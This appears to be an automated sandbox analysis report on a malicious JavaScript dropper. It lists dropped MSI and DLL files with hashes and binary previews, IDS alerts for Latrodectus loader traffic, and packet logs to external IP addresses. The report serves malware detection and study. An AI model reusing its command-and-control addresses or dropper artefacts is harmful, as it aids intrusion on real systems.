                                                                                                                                                                                                                                                  SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                                                  MD5:B1CA25F5BB4EDD293B3711C77EB99A6F
                                                                                                                                                                                                                                                  SHA1:178BBA8686EA329B884A652FE0F8A0AE0C53D367
                                                                                                                                                                                                                                                  SHA-256:97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                                                                                                                                                                                                                                                  SHA-512:D5A282A8F81E117B79616C44A260D89C7FEE06F4AC1387675BC79C3BD7599A5D49FBE3D8FB3D4D42EEA81A17564ABC2D42288BC2DC468D1B16ED633BA421B32D
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {26C6701E-5BA5-48FD-87C5-16BC3575B429}, Number of Words: 10, Subject: GloryDory, Author: OrbitalMast LLC, Name of Creating Application: GloryDory, Template: ;1033, Comments: This installer database contains the logic and data required to install GloryDory., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1669120
                                                                                                                                                                                                                                                  Entropy (8bit):7.187836999350755
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:5Sj3YhW8zBQSc0ZnSKSZKumZr7A+zafUWM1q:oYY0ZnQK/A7fQ
                                                                                                                                                                                                                                                  MD5:3CB6B99B20930AC0DBADC10899DC511E
                                                                                                                                                                                                                                                  SHA1:570C4AB78CF4BB22B78AAC215A4A79189D4FA9ED
                                                                                                                                                                                                                                                  SHA-256:EA1792F689BFE5AD3597C7F877B66F9FCF80D732E5233293D52D374D50CAB991
                                                                                                                                                                                                                                                  SHA-512:AEDF58EA01D59CCE191CB9C0F83DBDBF7E3E8F049C764B577D6A957CB5229C50DDA7EC6760CA43AD4DBDB085AE02B07BC818F69CA08373243019AF6683E4931C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: Document-19-51-48.js, Detection: malicious
• Filename: dsa.msi, Detection: malicious
• Filename: Document-19-27-03.js, Detection: malicious
• Filename: DLPAgent.msi, Detection: malicious
• Filename: Document-21-41-00.js, Detection: malicious
• Filename: CITROEN.msi, Detection: malicious
• Filename: DLPAgent.msi, Detection: malicious
• Filename: 6ylVfr0IVw.msi, Detection: malicious
• Filename: Document-19-25-24.js, Detection: malicious
• Filename: vfs.msi, Detection: malicious
                                                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: Document-19-51-48.js, Detection: malicious
• Filename: dsa.msi, Detection: malicious
• Filename: Document-19-27-03.js, Detection: malicious
• Filename: DLPAgent.msi, Detection: malicious
• Filename: Document-21-41-00.js, Detection: malicious
• Filename: CITROEN.msi, Detection: malicious
• Filename: DLPAgent.msi, Detection: malicious
• Filename: 6ylVfr0IVw.msi, Detection: malicious
• Filename: Document-19-25-24.js, Detection: malicious
• Filename: vfs.msi, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):446944
                                                                                                                                                                                                                                                  Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                  MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                  SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                  SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                  SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):401042
                                                                                                                                                                                                                                                  Entropy (8bit):6.591849280749257
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:+MvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO16:+MvZx0FlS68zBQSncb4ZPQTpAjZxqO16
                                                                                                                                                                                                                                                  MD5:9FCEE1CA0E8FED4486A6EC3F186817BE
                                                                                                                                                                                                                                                  SHA1:3A325D1CFE8A7116D24BC4A9103DF0554183FDDD
                                                                                                                                                                                                                                                  SHA-256:A654A2E127843FB770B6FEB20EB0F7E14EC68AD58A27439E9B76DBD8DB56F780
                                                                                                                                                                                                                                                  SHA-512:AE998EF41B62975697EDD261CA81DB52B1ACFF7FAB7C5D882CAEAA76E15CBCA5A854500B825706B9489F81F59FDB25C60B12E17F535EA3D7D5CA8121EC053D25
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@QuCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}..01:\Software\OrbitalMast LLC\GloryDory\Version.@.......@.....@.....@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}2.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".:.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@...
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):399328
                                                                                                                                                                                                                                                  Entropy (8bit):6.589290025452677
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                                                                                                  MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                  SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                                                                                                  SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                                                                                                  SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                  Entropy (8bit):1.5683445311085658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:y8PhTuRc06WXOKFT5dX2qSwYAErCyE9c7uSiHqSwmT3Nxv:dhT1MFTbX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:85C56D88D6DF48C9A03823764F257EEB
                                                                                                                                                                                                                                                  SHA1:F0E98723D2610D6AA633795DCF159A1198D23D4B
                                                                                                                                                                                                                                                  SHA-256:C3ABF141B4A345CC34922264929B0C6DB8A0C5D8018116CA1B0A1C0C944B4CA9
                                                                                                                                                                                                                                                  SHA-512:51756EF419DC69AE3478A7141E4E04F04F22EABC91332F924DA075E31F17809AE35399C22C1C37CB89B669B3795ACF46C90C54526B012DFB0955874131ED22FF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2563734827764652
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:NmLufPvGFXO7T5yX2qSwYAErCyE9c7uSiHqSwmT3Nxv:gL12TEX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:0EFDF746E575A82FC3B2E37FC6F62063
                                                                                                                                                                                                                                                  SHA1:F6BE1DB30500C516175EE4B6E7731BDA05872734
                                                                                                                                                                                                                                                  SHA-256:82EEACF622F4F47B03069FAC6135EE2F93E48EF49F75E532894D0168CD7DA8AB
                                                                                                                                                                                                                                                  SHA-512:4C8565344B1BD6FC30E56715E2E4D7D901102D1C8AF0ED0DBF91F34C6E42F5C5C0085904FB2113C0928455E33CE75D5331BBDC79AF56FE2F28298F26D32F9495
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2563734827764652
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:NmLufPvGFXO7T5yX2qSwYAErCyE9c7uSiHqSwmT3Nxv:gL12TEX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:0EFDF746E575A82FC3B2E37FC6F62063
                                                                                                                                                                                                                                                  SHA1:F6BE1DB30500C516175EE4B6E7731BDA05872734
                                                                                                                                                                                                                                                  SHA-256:82EEACF622F4F47B03069FAC6135EE2F93E48EF49F75E532894D0168CD7DA8AB
                                                                                                                                                                                                                                                  SHA-512:4C8565344B1BD6FC30E56715E2E4D7D901102D1C8AF0ED0DBF91F34C6E42F5C5C0085904FB2113C0928455E33CE75D5331BBDC79AF56FE2F28298F26D32F9495
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):73728
                                                                                                                                                                                                                                                  Entropy (8bit):0.138484202186345
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:5NxSAhMwTx0RqipV0RQ0RqipV0RYAEV0yjCyEV3+bpGw7sGgSi+FSnc+FC0:5NxvnTkqSwVqSwYAErCyE9c7uSi0k
                                                                                                                                                                                                                                                  MD5:A974A3C4E0428978197CC3D2FE7CFD71
                                                                                                                                                                                                                                                  SHA1:1469D8AAB74FF72EC8EB371B188D03CCD1170AD9
                                                                                                                                                                                                                                                  SHA-256:53CBD860FC95C1D099C02D223627134FBC625783131DC5A49224E6B6F75D0BB0
                                                                                                                                                                                                                                                  SHA-512:8C60B46C89A7728A16D242376B2B3DC143EE60ACA042471C16567311260D2C20C1AB233479CC7FEE4AE81A3ADD0DC309F517F9BB9C1556C1D0AF39AC621C34BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):1.2563734827764652
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:NmLufPvGFXO7T5yX2qSwYAErCyE9c7uSiHqSwmT3Nxv:gL12TEX2qZnwCx4WHqZW
                                                                                                                                                                                                                                                  MD5:0EFDF746E575A82FC3B2E37FC6F62063
                                                                                                                                                                                                                                                  SHA1:F6BE1DB30500C516175EE4B6E7731BDA05872734
                                                                                                                                                                                                                                                  SHA-256:82EEACF622F4F47B03069FAC6135EE2F93E48EF49F75E532894D0168CD7DA8AB
                                                                                                                                                                                                                                                  SHA-512:4C8565344B1BD6FC30E56715E2E4D7D901102D1C8AF0ED0DBF91F34C6E42F5C5C0085904FB2113C0928455E33CE75D5331BBDC79AF56FE2F28298F26D32F9495
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  File type:Unicode text, UTF-8 text, with very long lines (952), with CRLF, CR, NEL line terminators
                                                                                                                                                                                                                                                  Entropy (8bit):6.044529025662541
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                    File name:Document-18-33-08.js
                                                                                                                                                                                                                                                    File size:348'334 bytes
                                                                                                                                                                                                                                                    MD5:c05645ed2ec3ff5c541b99d20011a488
                                                                                                                                                                                                                                                    SHA1:6822c03f0781ac932c31747610f1fe1039f6861f
                                                                                                                                                                                                                                                    SHA256:a9a4640e3887e4ee71ae0e0624afa6b8fa6a22cdffd190f1d83234109dd8496d
                                                                                                                                                                                                                                                    SHA512:5c931e2c1c677bf2f9945b71d59f2b561d16fc43fcc3a51347e4787b2c16c0818356b0d77f889d6eacc0a3c549f1ae99f3ee145427ef13cfd94ce6175b4a7478
                                                                                                                                                                                                                                                    SSDEEP:6144:jkrTzZUnqgeguE0Hz5q9viFrdTCSaJPFVQTo6AP99eZ4krLBsxHfn5:8XSn7uEMzU9viFrtbap+52I4KLBsP
                                                                                                                                                                                                                                                    TLSH:BD74E001030BF3F0A19624F99C4283F5A5018FADB7D9B930C619EB72299E52E769F5D3
                                                                                                                                                                                                                                                    File Content Preview:../* <....*5K......n....>[........Q....n..y/.._J..{....Rz......3K..}....\\'..j\\'..P....~..8........_..........I........M../os[;5h......6..........QZ......?..tGx..#..>6..{....Yqp.... ..$=..x........$......................R7........]....K.....w.... ,..S}..
                                                                                                                                                                                                                                                    Icon Hash:68d69b8bb6aa9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T20:44:05.187319+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.5 | 50048 | 188.114.96.3 | 443 | TCP
2024-10-03T20:44:08.857690+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.5 | 50050 | 188.114.96.3 | 443 | TCP
2024-10-03T20:44:10.117125+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.5 | 50051 | 188.114.96.3 | 443 | TCP
2024-10-03T20:44:14.824356+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.5 | 50053 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.783123970 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.783175945 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.783356905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.783409119 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.787832022 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.787853003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.787918091 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.788077116 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.788094044 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.788108110 CEST8049704188.119.112.7192.168.2.5
